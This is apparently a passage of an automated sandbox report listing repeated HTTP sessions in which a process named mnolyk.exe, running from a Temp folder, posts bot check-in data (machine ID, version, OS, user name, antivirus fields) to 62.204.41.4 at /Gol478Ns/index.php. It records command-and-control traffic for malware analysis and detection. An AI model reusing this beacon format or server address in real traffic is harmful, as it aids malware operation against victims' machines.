                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    576192.168.2.35027962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:04.664943933 CET775OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.729394913 CET776INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    577192.168.2.35028062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:04.908554077 CET776OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.973890066 CET777INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    578192.168.2.35028162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:05.145159960 CET777OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:05.212060928 CET778INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    579192.168.2.35028262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:05.393872023 CET778OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:05.457537889 CET779INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    58192.168.2.34976062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:31.042505026 CET259OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.108855009 CET259INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    59192.168.2.34976162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:31.280569077 CET260OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.344552040 CET260INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.34970762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:10.935837030 CET206OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.000245094 CET207INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    60192.168.2.34976262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:31.524264097 CET261OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.588319063 CET261INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    61192.168.2.34976362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:31.780350924 CET262OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:31.843260050 CET262INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    62192.168.2.34976462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:32.057321072 CET263OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:32.123912096 CET263INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    63192.168.2.34976562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:32.555335999 CET264OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:32.620625019 CET264INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    64192.168.2.34976662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:32.973144054 CET265OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:33.038276911 CET265INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    65192.168.2.34976762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:33.408798933 CET266OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:33.474467039 CET266INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    66192.168.2.34976862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:33.720031977 CET267OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:33.785187006 CET267INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    67192.168.2.34976962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:34.756431103 CET268OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:34.819967031 CET268INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    68192.168.2.34977062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:35.698493004 CET269OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:35.764023066 CET269INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    69192.168.2.34977162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:36.658549070 CET270OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:36.723408937 CET270INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    7192.168.2.34970862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:11.181340933 CET207OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.245002985 CET208INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    70192.168.2.34977262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:37.016273022 CET271OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:37.082278967 CET271INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    71192.168.2.34977362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:37.289230108 CET272OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
